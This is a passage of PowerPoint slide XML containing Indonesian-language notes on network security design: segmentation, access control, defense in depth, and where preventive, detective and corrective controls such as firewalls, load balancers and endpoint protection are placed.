              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penempatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tujuannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menegakkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kritis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beragam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>detektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>korektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model OSI. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penempatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cermat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>topologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>opsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditempatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbatasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>preventif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>detektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditempatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> perimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipertukarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghindari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> perimeter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>preventif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>detektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>korektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diinstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ilustrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, diagram </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
